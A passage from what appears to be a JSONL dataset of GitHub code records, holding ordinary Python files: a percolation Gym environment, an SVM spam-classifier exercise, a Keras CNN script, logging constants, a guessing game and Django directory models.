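            self.balance += montant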
display=None):\n self.display = display\n\n def seed(self, seed=None):\n self.np_random, seed = seeding.np_random(seed)\n return [seed]\n\n def __del__(self):\n if self.enable_render is True:\n self.grid_view.quit_game()\n \n def is_game_over(self):\n return self.grid_view.game_over\n\n def step(self, action):\n #self.state = self.grid_view.grid.states.copy()\n self.grid_view.grid.register_move(action['x'], action['y'])\n self.state = self.grid_view.grid.states.copy()\n reward = 0\n done = self.is_game_over()\n info = {}\n\n return self.state, reward, done, info\n \n def reset(self, observation=np.array([])):\n self.grid_view.restart()\n self.grid_view.grid.fill_affected()\n if observation.any():\n self.state = observation\n self.grid_view.grid.states = observation\n else:\n self.state = self.grid_view.grid.states # added by Omkar\n #self.state = np.zeros(2) changes made by Omkar\n self.steps_beyond_done = None\n self.done = False\n return self.state\n \n def load(self,state):\n self.grid_view.restart()\n self.grid_view.grid.load(state)\n self.grid_view.grid.fill_affected()\n self.state = self.grid_view.grid.states.copy()\n self.steps_beyond_done = None\n self.done = False\n \n def render(self, mode=\"human\", close=False):\n if close:\n self.grid_view.quit_game()\n\n return self.grid_view.update(mode)\n\n\nclass PercolationEnvMode0(PercolationEnv):\n\n def __init__(self, grid_size=(25, 25), p=0.38, zero_thres=0.05, enable_render=True, np_seed=None):\n pgrid = PercolationGrid(grid_size=grid_size, p=p, zero_thres=zero_thres, np_seed=np_seed, enable_render=enable_render)\n super(PercolationEnvMode0, self).__init__(gridObject=pgrid, enable_render=enable_render, np_seed=np_seed)\n\n","repo_name":"Omkar20895/BLUE","sub_path":"gym-percolation/gym_percolation/envs/percolation_env.py","file_name":"percolation_env.py","file_ext":"py","file_size_in_byte":5236,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"54"} +{"seq_id":"4564304685","text":"from learning import *\n\n# Load from ex6data1\n# You will have X, y as keys in the dict data\ndata = loadmat(os.path.join('../Data', 'ex6data1.mat'))\nX, y = data['X'], data['y'][:, 0]\n\n# Plot training data\nutils.plotData(X, y)\npyplot.show()\n\n# You should try to change the C value below and see how the decision\n# boundary varies (e.g., try C = 1000)\nC = 1\n\nmodel = utils.svmTrain(X, y, C, utils.linearKernel, 1e-3, 20)\nutils.visualizeBoundaryLinear(X, y, model)\npyplot.show()\n\nx1 = np.array([1, 2, 1])\nx2 = np.array([0, 4, -1])\nsigma = 2\n\nsim = gaussianKernel(x1, x2, sigma)\n\nprint('Gaussian Kernel between x1 = [1, 2, 1], x2 = [0, 4, -1], sigma = %0.2f:'\n '\\n\\t%f\\n(for sigma = 2, this value should be about 0.324652)\\n' % (sigma, sim))\n\n\n# Load from ex6data2\n# You will have X, y as keys in the dict data\ndata = loadmat(os.path.join('../Data', 'ex6data2.mat'))\nX, y = data['X'], data['y'][:, 0]\n\n# Plot training data\nutils.plotData(X, y)\npyplot.show()\n\n# SVM Parameters\nC = 1\nsigma = 0.1\n\nmodel= utils.svmTrain(X, y, C, gaussianKernel, args=(sigma,))\nutils.visualizeBoundary(X, y, model)\npyplot.show()\n\n# Load from ex6data3\n# You will have X, y, Xval, yval as keys in the dict data\ndata = loadmat(os.path.join('../Data', 'ex6data3.mat'))\nX, y, Xval, yval = data['X'], data['y'][:, 0], data['Xval'], data['yval'][:, 0]\n\n# Plot training data\nutils.plotData(X, y)\npyplot.show()\n\n# Try different SVM Parameters here\nC, sigma = dataset3Params(X, y, Xval, yval)\n\n# Train the SVM\n# 
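# Worked example of the circular run-counting loop in action_space above
# (hypothetical 8-neighbour states; 0 stands for the 'Empty' code):
emptyNum = 0
stateVec = [1, 1, 0, 0, 1, 0, 1, 1]
nc = 1 if stateVec[0] != emptyNum else 0
for c in range(1, len(stateVec)):
    if stateVec[c] != emptyNum and stateVec[c - 1] == emptyNum:
        nc += 1
if len(stateVec) == 8 and stateVec[0] == stateVec[-1] and stateVec[0] != emptyNum:
    nc -= 1  # the run wrapping past the end was counted twice
# nc == 2: indices {6, 7, 0, 1} form one cluster, {4} the other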
model = utils.svmTrain(X, y, C, lambda x1, x2: gaussianKernel(x1, x2, sigma))\nmodel = utils.svmTrain(X, y, C, gaussianKernel, args=(sigma,))\nutils.visualizeBoundary(X, y, model)\npyplot.show()\nprint(C, sigma)\n\n\n# To convert each email into a vector of features, implement the preprocessing\n# steps for each email: complete the code in processEmail to produce a word\n# indices vector for a given email.\n\n# Extract Features\nwith open(os.path.join('../Data', 'emailSample1.txt')) as fid:\n    file_contents = fid.read()\n\nword_indices = processEmail(file_contents)\n\n# Print Stats\nprint('-------------')\nprint('Word Indices:')\nprint('-------------')\nprint(word_indices)\n\n\n# Extract Features\nwith open(os.path.join('../Data', 'emailSample1.txt')) as fid:\n    file_contents = fid.read()\n\nword_indices = processEmail(file_contents)\nfeatures = emailFeatures(word_indices)\n\n# Print Stats\nprint('\\nLength of feature vector: %d' % len(features))\nprint('Number of non-zero entries: %d' % sum(features > 0))\n\n\n# Load the Spam Email dataset\n# You will have X, y in your environment\ndata = loadmat(os.path.join('../Data', 'spamTrain.mat'))\nX, y = data['X'].astype(float), data['y'][:, 0]\n\nprint('Training Linear SVM (Spam Classification)')\nprint('This may take 1 to 2 minutes ...\\n')\n\nC = 0.1\nmodel = utils.svmTrain(X, y, C, utils.linearKernel)\n\n# Compute the training accuracy\np = utils.svmPredict(model, X)\n\nprint('Training Accuracy: %.2f' % (np.mean(p == y) * 100))\n\n# Load the test dataset\n# You will have Xtest, ytest in your environment\ndata = loadmat(os.path.join('../Data', 'spamTest.mat'))\nXtest, ytest = data['Xtest'].astype(float), data['ytest'][:, 0]\n\nprint('Evaluating the trained Linear SVM on a test set ...')\np = utils.svmPredict(model, Xtest)\n\nprint('Test Accuracy: %.2f' % (np.mean(p == ytest) * 100))\n\n# Sort the weights and obtain the vocabulary list\n# NOTE some words have the same weights, \n# so their order might be different than in the text above\nidx = np.argsort(model['w'])\ntop_idx = idx[-15:][::-1]\nvocabList = utils.getVocabList()\n\nprint('Top predictors of spam:')\nprint('%-15s %-15s' % ('word', 'weight'))\nprint('----' + ' '*12 + '------')\nfor word, w in zip(np.array(vocabList)[top_idx], model['w'][top_idx]):\n    print('%-15s %0.2f' % (word, w))\n\nfilename = os.path.join('../Data', 'emailSample1.txt')\n\nwith open(filename) as fid:\n    file_contents = fid.read()\n\nword_indices = processEmail(file_contents, verbose=False)\nx = emailFeatures(word_indices)\np = utils.svmPredict(model, x)\n\nprint('\\nProcessed %s\\nSpam Classification: %s' % (filename, 'spam' if p else 'not spam'))\n\n\n","repo_name":"vva2/Ml-projects","sub_path":"spam classifier/vishalvardhan_170108003/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":4118,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"}
{"seq_id":"34408606530","text":"from keras.models import Sequential\nfrom keras.layers import Dense\nfrom keras.layers import Flatten\nfrom keras.layers.convolutional import Conv1D\nfrom keras.layers.convolutional import MaxPooling1D\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport os\nos.environ['KERAS_BACKEND'] = 'tensorflow'  # note: must be set before keras is imported to take effect\n \ndef subdivide_data_array(data_array, number_of_data_points, number_of_chunks):\n    x1 = list()\n    x2 = list()\n    tst = list()\n    end_idx_location = 0\n    last_valid_location = number_of_data_points - 1\n    for idx in range(number_of_data_points):\n        
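# Sanity check of the Gaussian (RBF) kernel value quoted in the SVM script above:
import numpy as np
x1, x2, sigma = np.array([1, 2, 1]), np.array([0, 4, -1]), 2
val = np.exp(-np.sum((x1 - x2) ** 2) / (2 * sigma ** 2))
# val ~= 0.324652, matching the expected output the script prints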
end_idx_location = idx + number_of_chunks\n if end_idx_location > last_valid_location:\n break\n x1.append(data_array[idx:end_idx_location])\n x2.append(data_array[end_idx_location])\n for idx in range(3072,number_of_data_points):\n tst.append(data_array[idx])\n print(' x1.len(): ', len(x1), flush=True)\n print(' x2.len(): ', len(x2), flush=True)\n return np.array(x1), np.array(x2), np.array(tst)\n\ndef construct_model(number_of_chunks, number_of_features):\n model = Sequential()\n model.add(Conv1D(filters=128, kernel_size=3, activation='relu', input_shape=(number_of_chunks, number_of_features)))\n model.add(MaxPooling1D(pool_size=2))\n model.add(Flatten())\n model.add(Dense(64, activation='relu'))\n model.add(Dense(1))\n model.compile(optimizer='Adagrad', loss='mse')\n return model\n\ndef fit_model(model, x1, x2, num_epochs):\n model.fit(x1, x2, epochs=num_epochs, verbose=1)\n return model\n \ndef naive_prediction_from_model(model, test_input, number_of_chunks, number_of_features):\n test_input = test_input.reshape((1, number_of_chunks, number_of_features))\n predicted = model.predict(test_input, verbose=0)\n return predicted\n\ndef generate_model(data_array, number_of_data_points, number_of_chunks, number_of_features, num_epochs):\n predicted = 0\n x1, x2, test_input = subdivide_data_array(data_array, number_of_data_points, number_of_chunks)\n print(' x1.size(): ', np.size(x1), flush=True)\n print(' x2.size(): ', np.size(x2), flush=True)\n x1 = x1.reshape((x1.shape[0], x1.shape[1], number_of_features))\n print(' x1[10].size(): ', np.size(x1[10]), flush=True)\n model = construct_model(number_of_chunks, number_of_features)\n model = fit_model(model, x1, x2, num_epochs)\n return model, test_input\n\ndef plot_data(data_array):\n fig, axs = plt.subplots(3, figsize=(10,5))\n fig.suptitle('Vertically stacked subplots')\n axs[0].plot(data_array[0,:], color = 'red')\n axs[1].plot(data_array[1,:], color = 'green')\n axs[2].plot(data_array[2,:], color = 'blue')\n plt.show()\n\ndef execute(filnam):\n predicted = 0\n tmp_array = np.load(filnam)\n data_array = tmp_array[0,:]\n stride = 4\n num_epochs = 1000\n number_of_features = 1\n number_of_data_points = len(data_array)\n number_of_chunks = (int)(number_of_data_points/stride)\n print('number_of_chunks: ', number_of_chunks)\n model, test_input = generate_model(data_array, number_of_data_points, number_of_chunks, number_of_features, num_epochs)\n prediction = naive_prediction_from_model(model, test_input, len(test_input), number_of_features)\n #plt.figure(1)\n #plt.plot(test_input)\n #plt.show()\n print(' test_input: ', test_input, flush=True)\n print(' max test_input: ', test_input.max(), flush=True)\n print(' min test_input: ', test_input.min(), flush=True)\n print(' prediction: ', prediction, flush=True)\n\nif __name__==\"__main__\":\n print(' Running ', flush=True)\n filnam = 'test.npy'\n execute(filnam)\n print(' Complete ', flush=True)","repo_name":"qjk5736/example_codes","sub_path":"python/keras_1d_cnn_time_series/keras_1D_time_series.py","file_name":"keras_1D_time_series.py","file_ext":"py","file_size_in_byte":3623,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"54"} +{"seq_id":"18259721458","text":"\"\"\"**emloop** module containing various constants.\"\"\"\n\nEL_LOG_FORMAT = '%(asctime)s.%(msecs)03d: %(levelname)-8s@%(module)-12s: %(message)s'\n\"\"\"General logging format.\"\"\"\n\nEL_LOG_DATE_FORMAT = '%Y-%m-%d %H:%M:%S'\n\"\"\"Date format used in logging.\"\"\"\n\nEL_FULL_DATE_FORMAT = 
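# Toy illustration of the sliding-window split done by subdivide_data_array above:
# each window of `number_of_chunks` points predicts the point right after it.
import numpy as np
data = np.arange(10)
w = 4
X = np.array([data[i:i + w] for i in range(len(data) - w)])
y = data[w:]
# X.shape == (6, 4); y.shape == (6,); e.g. X[0] == [0 1 2 3] predicts y[0] == 4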
'%Y-%m-%d %H:%M:%S.%f'\n\"\"\"Full date format.\"\"\"\n\nEL_HOOKS_MODULE = 'emloop.hooks'\n\"\"\"Module with standard emloop hooks (as would be used in import).\"\"\"\n\nEL_CONFIG_FILE = 'config.yaml'\n\"\"\"Configuration file name (dumped in the output directory).\"\"\"\n\nEL_DEFAULT_LOG_DIR = './log'\n\"\"\"Default log directory.\"\"\"\n\nEL_LOG_FILE = 'train.log'\n\"\"\"Log file (dumped in the output directory).\"\"\"\n\nEL_TRACE_FILE = 'trace.yaml'\n\"\"\"Training trace filename.\"\"\"\n\nEL_PREDICT_STREAM = 'predict'\n\"\"\"Predict stream name.\"\"\"\n\nEL_NA_STR = 'N/A'\n\"\"\"N/A string for pretty printing.\"\"\"\n\nEL_BUFFER_SLEEP = 0.02\n\"\"\"The duration for which the buffer sleeps before it starts to process the next batch.\"\"\"\n\nEL_DEFAULT_TRAIN_STREAM = 'train'\n\"\"\"The stream to be used for training.\"\"\"\n\n__all__ = ['EL_LOG_FORMAT', 'EL_LOG_DATE_FORMAT', 'EL_FULL_DATE_FORMAT', 'EL_HOOKS_MODULE', 'EL_CONFIG_FILE',\n           'EL_LOG_FILE', 'EL_TRACE_FILE', 'EL_DEFAULT_TRAIN_STREAM', 'EL_PREDICT_STREAM', 'EL_DEFAULT_LOG_DIR',\n           'EL_NA_STR', 'EL_BUFFER_SLEEP']\n","repo_name":"iterait/emloop","sub_path":"emloop/constants.py","file_name":"constants.py","file_ext":"py","file_size_in_byte":1288,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"54"}
{"seq_id":"25941105104","text":"import random\r\n\r\ntop_of_range=input(\"Please choose top of range value: \")\r\n\r\nif top_of_range.isdigit():\r\n    top_of_range=int(top_of_range)\r\n\r\nelse:\r\n    print(\"Please enter a number next time\")\r\n    quit()\r\n\r\nrandom_value=random.randint(0,top_of_range)\r\nguess=0\r\nprint(random_value)  # debug leftover: reveals the secret number\r\n\r\nwhile True:\r\n    guess+=1\r\n    guess_value=input(\"Please guess a value in the range from 0 to \" + str(top_of_range) + \": \" )\r\n\r\n    if guess_value.isdigit():\r\n        guess_value=int(guess_value)\r\n\r\n    else:\r\n        print(\"Please enter a number next time\")\r\n        continue\r\n\r\n    if guess_value == random_value:\r\n        print(\"You got it!\")\r\n        print(\"You got it right in \" + str(guess) + \" guesses\") \r\n        break\r\n    elif guess_value>random_value:\r\n        print(\"You were above the number\")\r\n    else:\r\n        print(\"You were below the number\")\r\n    \r\n","repo_name":"VikVist/GitHub-Python","sub_path":"Guess_the_number.py","file_name":"Guess_the_number.py","file_ext":"py","file_size_in_byte":803,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"}
{"seq_id":"71399850081","text":"# -*- coding:utf-8 -*-\nfrom django.db import models\nfrom django.db.models import Count\nfrom autoslug import AutoSlugField\nfrom extended_choices import Choices\nfrom django_extensions.db import fields as exfields\nfrom django.utils.translation import ugettext_lazy as _\nfrom django.core.urlresolvers import reverse\nfrom django.contrib.contenttypes import generic\nfrom django.contrib.contenttypes.models import ContentType\nfrom django.core.exceptions import ValidationError\nfrom django.conf import settings\nfrom coop.models import URIModel\nfrom sorl.thumbnail import ImageField\nfrom sorl.thumbnail import default\nimport rdflib\nimport coop\nfrom django.contrib.sites.models import Site\nimport logging\nfrom urlparse import urlsplit\nimport simplejson\nfrom django.contrib.gis.db import models as geomodels\n\n\n#from mptt.models import MPTTModel, TreeForeignKey\n# class BaseClassification(MPTTModel, URIModel):\n#     label = models.CharField(_(u'label'), max_length=60)\n#     slug = AutoSlugField(populate_from='label', always_update=True, unique=True)\n#     
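# Usage sketch for the logging constants defined in the emloop module above:
import logging
logging.basicConfig(format=EL_LOG_FORMAT, datefmt=EL_LOG_DATE_FORMAT, level=logging.INFO)
# produces lines shaped like: 2023-01-01 12:00:00.000: INFO    @mymodule    : message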
parent = TreeForeignKey('self', null=True, blank=True, related_name='children')\n#     domain_name = 'thess.economie-solidaire.fr'\n\n#     class MPTTMeta:\n#         order_insertion_by = ['label']\n\n#     class Meta:\n#         abstract = True\n#         verbose_name = _('Classification')\n#         verbose_name_plural = _('Classifications')\n#         ordering = ['tree_id', 'lft']  # for FeinCMS TreeEditor\n#         app_label = 'coop_local'\n\n#     def __unicode__(self):\n#         return unicode(self.label)\n\n#     def get_absolute_url(self):\n#         return reverse('%s-detail' % self._meta.object_name.lower(), args=[self.slug])\n\n#     @property\n#     def uri_id(self):\n#         return self.slug\n\n#     def uri_registry(self):\n#         return u'label'\n\n\nclass BaseRoleCategory(models.Model):\n    label = models.CharField(_(u'label'), max_length=60)\n    slug = exfields.AutoSlugField(populate_from=('label'), overwrite=True)\n    uri = models.CharField(_(u'URI'), blank=True, max_length=250)\n\n    def save(self, *args, **kwargs):\n        self.save_base()\n        self.uri = u'http://thess.economie-solidaire.fr/id/role/%s/' % self.slug\n        super(BaseRoleCategory, self).save(*args, **kwargs)\n\n    class Meta:\n        abstract = True\n        ordering = ['label']\n        verbose_name = _('Role category')\n        verbose_name_plural = _('Role categories')\n        #ordering = ['label']\n        app_label = 'coop_local'\n\n    def __unicode__(self):\n        return unicode(self.label)\n\n\nclass BaseRole(URIModel):\n    label = models.CharField(_(u'label'), max_length=120)\n    slug = AutoSlugField(populate_from='label', always_update=True, unique=True, editable=False)\n    category = models.ForeignKey('coop_local.RoleCategory', null=True, blank=True, verbose_name=_(u'category'))\n\n    domain_name = 'thess.economie-solidaire.fr'\n\n    class Meta:\n        abstract = True\n        verbose_name = _('Role')\n        verbose_name_plural = _('Roles')\n        #ordering = ['tree_id', 'lft']  # for FeinCMS TreeEditor\n        #ordering = ['label']\n        app_label = 'coop_local'\n\n    @property\n    def uri_id(self):\n        return self.slug\n\n    def uri_registry(self):\n        return u'label'\n\n    def __unicode__(self):\n        return unicode(self.label)\n\n    def get_absolute_url(self):\n        return reverse('role_detail', args=[self.slug])\n\n    # rdf stuff\n    rdf_type = settings.NS.org.Role\n    base_mapping = [\n        ('single_mapping', (settings.NS.dct.created, 'created'), 'single_reverse'),\n        ('single_mapping', (settings.NS.dct.modified, 'modified'), 'single_reverse'),\n        ('single_mapping', (settings.NS.skos.prefLabel, 'label'), 'single_reverse'),\n\n        # once RoleCategory is a URIModel we will simply have\n        #('single_mapping', (settings.NS.skos.broader, 'category'), 'single_reverse'),\n\n        ('category_mapping', (settings.NS.skos.broader, 'category'), 'category_mapping_reverse'),\n    ]\n\n    def category_mapping(self, rdfPred, djF, lang=None):\n        value = getattr(self, djF)\n        if value == None:\n            return []\n        else:\n            return [(rdflib.term.URIRef(self.uri), rdfPred, rdflib.term.URIRef(value.uri))]\n\n    def category_mapping_reverse(self, g, rdfPred, djF, lang=None):\n        values = list(g.objects(rdflib.term.URIRef(self), rdfPred))\n        if values == []:\n            setattr(self, djF, None)\n        elif len(values) == 1:\n            value = values[0]\n            setattr(self, djF, models.get_model('coop_base', 'rolecategory').objects.get(uri=value))\n\n\n# will apply to contact numbers and other things\n# TODO simplify it, see PPO Ontology\n\nDISPLAY = Choices(\n    ('PUBLIC', 1, _(u'public information')),\n    ('USERS', 2, _(u'registered members')),\n    ('ADMIN', 3, _(u'administrators of this site')),\n)\n\nCOMM_MEANS = Choices(\n    ('MAIL', 8, _(u'E-mail')),\n    ('LAND', 1, _(u'Landline phone')),\n    ('GSM', 2, _(u'Mobile 
phone')),\n ('FAX', 3, _(u'Fax')),\n ('WEB', 9, _(u'Secondary web site')),\n ('SKYPE', 4, _(u'Skype')),\n ('TWITTER', 5, _(u'Twitter')),\n ('RSS', 6, _(u'RSS Feed')),\n ('VCAL', 7, _(u'vCalendar')),\n)\n\n\nclass BaseContactMedium(models.Model): # this model will be initialized with a fixture\n label = models.CharField(_(u'label'), max_length=250)\n uri = models.CharField(_(u'URI'), blank=True, max_length=250)\n\n def __unicode__(self):\n return self.label\n\n class Meta:\n abstract = True\n verbose_name = _(u'Contact medium')\n verbose_name_plural = _(u'Contact mediums')\n app_label = 'coop_local'\n\n\nclass BaseContact(URIModel):\n \"\"\" A model which represents any communication medium (a phone number, an email) \"\"\"\n # category = models.PositiveSmallIntegerField(_(u'Category'),\n # choices=COMM_MEANS.CHOICES, editable=False, blank=True, null=True) # TODO erase when data migrated\n contact_medium = models.ForeignKey('coop_local.ContactMedium', verbose_name=u'medium')\n\n content = models.CharField(_(u'content'), max_length=250)\n details = models.CharField(_(u'details'), blank=True, max_length=100)\n display = models.PositiveSmallIntegerField(_(u'Display'),\n choices=DISPLAY.CHOICES, default=DISPLAY.ADMIN)\n\n content_type = models.ForeignKey(ContentType, blank=True, null=True)\n object_id = models.PositiveIntegerField()\n content_object = generic.GenericForeignKey('content_type', 'object_id')\n\n class Meta:\n abstract = True\n # ordering = ['contact_medium']\n verbose_name = _(u'Contact')\n verbose_name_plural = _(u'Contacts')\n app_label = 'coop_local'\n\n def __unicode__(self):\n if self.content_object != None and self.contact_medium_id != 8:\n return self.content + u' (' + self.content_object.__unicode__() + u')'\n else:\n return self.content\n\n def label(self):\n return self.__unicode__()\n\n @classmethod\n def clean_phone(cls, number):\n import re\n phoneSplitRegex = re.compile(r\"[\\-\\(\\) \\.\\,]\")\n parts = phoneSplitRegex.split(number)\n num = ''.join(parts)\n if len(num) == 10:\n cleaned_number = '.'.join((num[:2], num[2:4], num[4:6], num[6:8], num[8:]))\n return cleaned_number\n else:\n raise ValidationError(_(u'Phone numbers must have 10 digits'))\n\n def save(self, *args, **kwargs):\n if self.contact_medium_id in [1, 2, 3]:\n self.content = self.clean_phone(self.content)\n #logging.error(u'A contact has been created or modified', exc_info=True, extra={'request': request})\n super(BaseContact, self).save(*args, **kwargs)\n\n\n\n # RDF stuff\n def isOpenData(self):\n return self.display == DISPLAY.PUBLIC\n\n rdf_type = settings.NS.ess.ContactMedium\n\n base_mapping = [\n ('single_mapping', (settings.NS.dct.created, 'created'), 'single_reverse'),\n ('single_mapping', (settings.NS.dct.modified, 'modified'), 'single_reverse'),\n ('single_mapping', (settings.NS.rdf.value, 'content'), 'single_reverse'),\n ('single_mapping', (settings.NS.rdfs.comment, 'details'), 'single_reverse'),\n\n ('medium_mapping', (settings.NS.rdf.type, 'contact_medium'), 'medium_mapping_reverse'),\n ]\n\n\n def medium_mapping(self, rdfPred, djF, lang=None):\n medium = getattr(self, djF)\n rdfSubject = rdflib.URIRef(self.uri)\n return [(rdfSubject, rdfPred, rdflib.URIRef(medium.uri))]\n\n\n def medium_mapping_reverse(self, g, rdfPred, djF, lang=None):\n values = list(g.objects(rdflib.term.URIRef(self.uri), rdfPred)) \n values.remove(self.rdf_type)\n m = models.get_model('coop_local', 'contactmedium')\n if len(values) == 1:\n value = values[0]\n medium = m.objects.get(uri=str(value))\n setattr(self, 
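# Behaviour sketch for BaseContact.clean_phone above (hypothetical inputs):
# separators are stripped, then a 10-digit number is regrouped into pairs.
assert BaseContact.clean_phone("01 23-45.67 89") == "01.23.45.67.89"
# anything that does not reduce to exactly 10 digits raises ValidationError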
djF, medium)\n\n\n# TODO : use django-multilingual-ng to translate the label field in multiple languages\n\nclass BaseOrgRelationType(models.Model):  # this model will be initialized with a fixture\n    label = models.CharField(_(u'label'), max_length=250)\n    uri = models.CharField(_(u'URI'), blank=True, max_length=250)\n    key_name = models.CharField(_(u'key name'), max_length=250, blank=True)\n    org_to_org = models.BooleanField(_('available for org-to-org relations'), default=True)\n    org_to_project = models.BooleanField(_('available for org-to-project relations'), default=True)\n\n    def __unicode__(self):\n        return self.label\n\n    class Meta:\n        abstract = True\n        verbose_name = _(u'Organization relation type')\n        verbose_name_plural = _(u'Organization relation types')\n        app_label = 'coop_local'\n\n\nRELATIONS = Choices(\n    ('MEMBER', 1, _(u' is member of ')),\n    ('REG_SUPPLIER', 2, _(u' has for regular supplier ')),\n    ('OCC_SUPPLIER', 3, _(u' has for casual supplier ')),\n    ('SUPPORT', 4, _(u' received technical support from ')),\n    ('FUNDING', 5, _(u' received financial support from ')),\n)\n\n\nclass BaseRelation(models.Model):\n    source = models.ForeignKey('coop_local.Organization', verbose_name=_(u'source organization'), related_name='source')\n    target = models.ForeignKey('coop_local.Organization', verbose_name=_(u'target organization'), related_name='target')\n    reltype = models.PositiveSmallIntegerField(_(u'Relation type'), choices=RELATIONS.CHOICES, blank=True, null=True)  # TODO erase when data migrated AND remove\n    relation_type = models.ForeignKey('coop_local.OrgRelationType',\n                                      verbose_name=_(u'relation type'),\n                                      null=True, blank=True)\n\n    created = exfields.CreationDateTimeField(_(u'created'), null=True)\n    modified = exfields.ModificationDateTimeField(_(u'modified'), null=True)\n    #confirmed = models.BooleanField(default=False, verbose_name=_(u'confirmed by the target organization'))\n\n    class Meta:\n        abstract = True\n        verbose_name = _('Relation')\n        verbose_name_plural = _('Relations')\n        app_label = 'coop_local'\n\n    def __unicode__(self):\n        return _(u\"Relation : %(a)s is a %(r)s of %(b)s\") % {'a': self.source.__unicode__(),\n                                                             'r': self.relation_type.__unicode__(),\n                                                             'b': self.target.__unicode__()}\n    '''\n    # TODO\n    def save(self):\n        check whether the inverse relation already exists\n    '''\n\n\nclass BaseEngagement(URIModel):\n    person = models.ForeignKey('coop_local.Person', verbose_name=_(u'person'), related_name='engagements')\n    organization = models.ForeignKey('coop_local.Organization', verbose_name=_(u'organization'))\n    role = models.ForeignKey('coop_local.Role', verbose_name=_(u'role'), null=True, blank=True)\n    role_detail = models.CharField(_(u'detailed role'), blank=True, max_length=100)\n    org_admin = models.BooleanField(_(u'has editor rights'), default=True)\n    engagement_display = models.PositiveSmallIntegerField(_(u'Display'), choices=DISPLAY.CHOICES, default=DISPLAY.PUBLIC)\n\n    remote_person_uri = models.URLField(_(u'remote person URI'), blank=True, null=True, max_length=255, editable=False)\n    remote_person_label = models.CharField(_(u'remote person label'),\n                                           max_length=250, blank=True, null=True,\n                                           help_text=_(u'fill this only if the person record is not available locally'))\n\n    remote_role_uri = models.URLField(_(u'URI'), blank=True, null=True, max_length=250)\n    remote_role_label = models.CharField(blank=True, null=True, max_length=100)\n\n    remote_organization_uri = models.URLField(_(u'remote organization URI'), blank=True, null=True, max_length=255, editable=False)\n    remote_organization_label 
= models.CharField(_(u'remote organization label'),\n max_length=250, blank=True, null=True,\n help_text=_(u'fill this only if the organization record is not available locally'))\n\n\n\n class Meta:\n abstract = True\n verbose_name = _('Engagement')\n verbose_name_plural = _('Engagements')\n app_label = 'coop_local'\n\n def __unicode__(self):\n if self.role:\n return '%(person)s, %(role)s @ %(org)s' % {\n 'person': self.person.__unicode__(),\n 'role': self.role.__unicode__(),\n 'org': self.organization.__unicode__()\n }\n else:\n return '%(person)s, %(role)s @ %(org)s' % {\n 'person': self.person.__unicode__(),\n 'role': self.remote_role_label if self.remote_role_label else '',\n 'org': self.organization.__unicode__()\n }\n\n def label(self):\n return self.__unicode__()\n\n # RDF stufs\n def isOpenData(self):\n return self.engagement_display == DISPLAY.PUBLIC\n\n rdf_type = settings.NS.org.Membership\n base_mapping = [\n ('single_mapping', (settings.NS.dct.created, 'created'), 'single_reverse'),\n ('single_mapping', (settings.NS.dct.modified, 'modified'), 'single_reverse'),\n ('single_mapping', (settings.NS.org.member, 'person'), 'single_reverse'),\n\n ('local_or_remote_mapping', (settings.NS.org.organization, 'organization'), 'local_or_remote_reverse'),\n ('local_or_remote_mapping', (settings.NS.org.role, 'role'), 'local_or_remote_reverse'),\n\n ('label_mapping', (settings.NS.rdfs.label, 'id', 'fr'), 'label_mapping_reverse'),\n\n ]\n\n def label_mapping(self, rdfPred, djF, lang):\n return [(rdflib.term.URIRef(self.uri), rdfPred, rdflib.term.Literal(u'Engagement n°%s' % self.id, lang))]\n\n def label_mapping_reverse(self, g, rdfPred, djF, lang=None):\n pass\n\n\nclass BaseOrganizationCategory(models.Model):\n label = models.CharField(blank=True, max_length=100)\n slug = exfields.AutoSlugField(populate_from=('label'), overwrite=True)\n description = models.TextField(_(u'description'), blank=True)\n\n class Meta:\n abstract = True\n verbose_name = _(u'organization category')\n verbose_name_plural = _(u'organization categories')\n app_label = 'coop_local'\n\n def __unicode__(self):\n return self.label\n\n #@models.permalink\n def get_absolute_url(self):\n return reverse('org_category_detail', args=[self.slug])\n\n def get_edit_url(self):\n return reverse('org_category_edit', args=[self.slug])\n\n def get_cancel_url(self):\n return reverse('org_category_edit_cancel', args=[self.slug])\n\n def _can_modify_organizationcategory(self, user):\n if user.is_authenticated():\n if user.is_superuser:\n return True\n else:\n return False\n\n def can_view_organizationcategory(self, user):\n # TODO use global privacy permissions on objects\n return True\n\n def can_edit_organizationcategory(self, user):\n return self._can_modify_organizationcategory(user)\n\n\n\n\n\n\n\nPREFLABEL = Choices(\n ('TITLE', 1, _(u'title')),\n ('ACRO', 2, _(u'acronym')),\n)\n\n\ndef get_logo_folder(self, filename):\n img_root = 'org_logos'\n return u'{0}/{1}/{2}'.format(img_root, self.id, filename)\n\n\nclass BaseOrganization(URIModel):\n title = models.CharField(_(u'title'), max_length=250)\n\n acronym = models.CharField(_(u'acronym'), max_length=100, blank=True, null=True)\n pref_label = models.PositiveSmallIntegerField(_(u'Preferred label'),\n choices=PREFLABEL.CHOICES,\n default=PREFLABEL.TITLE)\n\n subtitle = models.CharField(_(u'tagline'), blank=True, null=True,\n max_length=250,\n help_text=_(u'tell us what your organization do in one line.'))\n\n description = models.TextField(_(u'description'), blank=True, 
null=True)\n\n logo = ImageField(upload_to='logos/', null=True, blank=True)\n #temp_logo = models.ImageField(upload_to=get_logo_folder, blank=True, null=True, default='')\n\n relations = models.ManyToManyField('coop_local.Organization',\n symmetrical=False, through='coop_local.Relation',\n verbose_name=_(u'relations'))\n\n category = models.ManyToManyField('coop_local.OrganizationCategory',\n blank=True, null=True, verbose_name=_(u'category'))\n\n members = models.ManyToManyField('coop_local.Person',\n through='coop_local.Engagement',\n verbose_name=_(u'members'))\n\n contacts = generic.GenericRelation('coop_local.Contact')\n\n if 'coop.mailing' in settings.INSTALLED_APPS:\n subs = generic.GenericRelation('coop_local.Subscription')\n newsletter = models.ForeignKey('coop_local.Newsletter', verbose_name=u'newsletter',\n blank=True, null=True, related_name='news_organization',\n on_delete=models.SET_NULL)\n\n\n # ORDER : coop_geo must be loaded BEFORE coop_local\n if \"coop_geo\" in settings.INSTALLED_APPS:\n located = generic.GenericRelation('coop_geo.Located') # , related_name='located_org')\n framed = generic.GenericRelation('coop_geo.AreaLink') # , related_name='framed_org')\n\n birth = models.DateField(_(u'creation date'), null=True, blank=True)\n email = 